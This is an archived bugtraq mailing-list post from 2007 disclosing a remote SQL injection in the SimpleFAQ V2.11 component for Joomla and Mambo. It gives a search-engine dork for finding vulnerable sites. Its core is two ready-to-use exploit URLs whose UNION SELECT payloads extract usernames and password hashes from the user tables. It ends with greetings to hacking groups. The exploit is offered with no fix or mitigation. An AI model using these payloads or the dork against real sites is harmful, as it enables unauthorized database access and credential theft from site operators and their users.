bugtraq August 2007 archive
Main Archive Page > Month Archives  > bugtraq archives
bugtraq: Joomla Component SimpleFAQ V2.11 - Remote SQL Injection

Joomla Component SimpleFAQ V2.11 - Remote SQL Injection

From: <k1tk4t_at_nospam>
Date: Mon Aug 20 2007 - 21:02:26 GMT
To: bugtraq@securityfocus.com
('binary' encoding is not supported, stored as-is) ######################################################################## # Joomla Component SimpleFAQ V2.11 - Remote SQL Injection # Vendor : http://www.parkviewconsultants.com/ # Found By : k1tk4t - k1tk4t[4t]newhack.org # Location : Indonesia -- #newhack[dot]org @irc.dal.net # Dork : inurl:"index.php?option=com_simplefaq" ########################################################################

joomla exploit
http://localhost/mambo/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/from/**/jos_users/*

mambo exploit;
http://localhost/mambo/index.php?option=com_simplefaq&task=answer&Itemid=9999&catid=9999&aid=-1/**/union/**/select/**/0,username,password,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0,0/**/from/**/mos_users/* ######################################################################## Thanks;
str0ke
xoron,y3dips,mathdule,iFX,x-ace,nyubi,selikoer dan semua temen2 komunitas security&hacking



-newhack[dot]org|staff-
mR.opt1lc,fusion,fl3xu5,PusHm0v,Ghoz,bius,iind_id,slackX

all member newhack[dot]org

all member echo.or.id

all member www.yogyafree.net

all member www.sekuritionline.net

all member www.kecoak-elektronik.net

semua komunitas hacker&security Indonesia